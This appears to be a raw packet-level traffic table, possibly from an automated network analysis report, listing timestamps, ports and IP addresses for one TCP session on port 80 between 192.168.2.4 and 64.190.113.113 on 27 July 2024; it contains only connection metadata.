Jul 27, 2024 08:54:03.214442015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214458942 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214464903 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214483023 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214483023 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214499950 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214514971 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214523077 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214529991 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214540005 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214545965 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214561939 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214577913 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214586020 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214591980 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214622021 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214653015 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218300104 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218323946 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218369961 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218374014 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218389988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218405962 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218420982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218436956 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218451023 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218466997 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218482018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218497992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218513012 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218528986 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218544960 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218560934 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218575954 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218591928 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218607903 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218611002 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218611956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218611956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218611956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218611956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218611956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218611956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218624115 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218638897 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218653917 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218669891 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218684912 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.218697071 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218697071 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218697071 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.218750954 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.219929934 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.219953060 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.219979048 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.219994068 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220009089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220016956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220025063 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220041037 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220052958 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220056057 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220072031 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220087051 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220088959 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220102072 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220117092 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220130920 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220132113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220148087 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220155001 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220165014 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220179081 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.220191002 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220225096 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.220242977 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632452965 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632477045 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632514954 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632529974 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632544994 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632560015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632575989 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632591963 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632608891 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632622957 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632637978 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632652998 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632668018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632683039 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632723093 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632750988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632766008 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632780075 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632775068 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632775068 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632775068 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632775068 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632776022 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632795095 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632811069 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632827044 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632843018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632858038 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632859945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632859945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632859945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632873058 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632884026 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632889032 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632913113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632927895 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632939100 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632952929 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632966042 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.632967949 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632982969 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.632998943 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633007050 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633013010 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633028030 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633032084 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633044004 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633054018 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633059978 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633083105 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633097887 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633111954 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633127928 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633127928 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633127928 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633152962 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633162022 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633167028 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633183956 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633198977 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633208036 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633213997 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633229017 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633234024 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633256912 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633286953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633311033 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633325100 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633338928 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633339882 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633363962 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633378983 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633378983 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633394003 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633409023 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633414030 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633424044 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633440018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633441925 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633455038 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633474112 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633477926 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633490086 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633497953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633505106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633512974 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633522034 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633537054 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633558989 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633563042 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633578062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633593082 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633603096 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633608103 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633621931 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633625031 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633636951 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633657932 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633661032 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633676052 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633681059 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633693933 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633708954 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633724928 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633724928 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633739948 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633753061 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633755922 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633770943 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633785009 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633786917 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633799076 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633814096 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633826017 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633836985 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633841991 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633852959 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633867025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633883953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633889914 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633899927 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633910894 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633917093 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633930922 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633944988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633949041 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633960009 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633969069 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.633974075 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.633987904 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634001970 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634006977 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634021044 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634032011 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634037018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634052992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634067059 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634068966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634084940 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634099960 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634103060 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634114981 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634130955 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634138107 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634145975 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634159088 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634162903 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634179115 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634196043 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634203911 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634218931 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634224892 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634232998 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634248972 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634263992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634269953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634287119 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634291887 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634300947 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634318113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634331942 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634335041 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634346962 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634361982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634375095 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634376049 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634376049 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634390116 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634404898 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634406090 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634419918 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634438038 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634448051 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634462118 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634469986 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634478092 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634491920 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634506941 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634506941 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634521008 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634536028 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634550095 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634550095 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634565115 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634567022 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634581089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634597063 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634601116 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634613037 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634623051 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634624004 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634640932 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634650946 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634656906 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634666920 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634673119 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634689093 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634704113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634717941 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634718895 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634721994 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634747028 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634753942 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634769917 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634777069 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634784937 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634797096 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634819984 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634831905 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634835005 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634851933 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634852886 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634867907 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634881020 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634885073 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634901047 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634917021 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634926081 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634948015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634960890 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.634963036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634989023 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.634994984 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635004044 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635018110 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635031939 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635032892 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635046959 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635051966 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635065079 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635071993 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635081053 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635096073 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635109901 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635111094 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635124922 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635128975 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635139942 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635157108 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635158062 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635173082 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635188103 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635199070 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635202885 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635217905 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635217905 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635234118 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635252953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635265112 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635276079 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635281086 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635296106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635309935 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635324001 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635327101 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635339975 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635354042 CEST	80	50691	64.190.113.113	192.168.2.4
